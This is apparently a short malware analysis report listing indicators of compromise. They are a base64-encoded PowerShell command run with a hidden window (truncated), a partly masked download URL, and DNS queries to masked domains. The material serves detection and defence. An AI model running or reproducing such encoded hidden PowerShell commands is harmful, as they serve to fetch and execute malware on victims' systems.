Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAGkAaABkAG8AbwBxAHUAPQAnAGcAbwBlAGYAdgBlAHUAcgBwAG8AbwByAHgAbwBpAHQAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AGAAUgBJAGAAVABZAHAAUgBgAE...
- http://z-####company.com/cgi-bin/Bn2bet3uy9384/
- DNS ASK ad###box.com
- DNS ASK dn####lutions.com
- DNS ASK z-####company.com
- DNS ASK ci#####lbinhthuan.com
- DNS ASK ap#####dhammuine.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAGkAaABkAG8AbwBxAHUAPQAnAGcAbwBlAGYAdgBlAHUAcgBwAG8AbwByAHgAbwBpAHQAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AGAAUgBJAGAAVABZAHAAUgBgAE...' (with hidden window)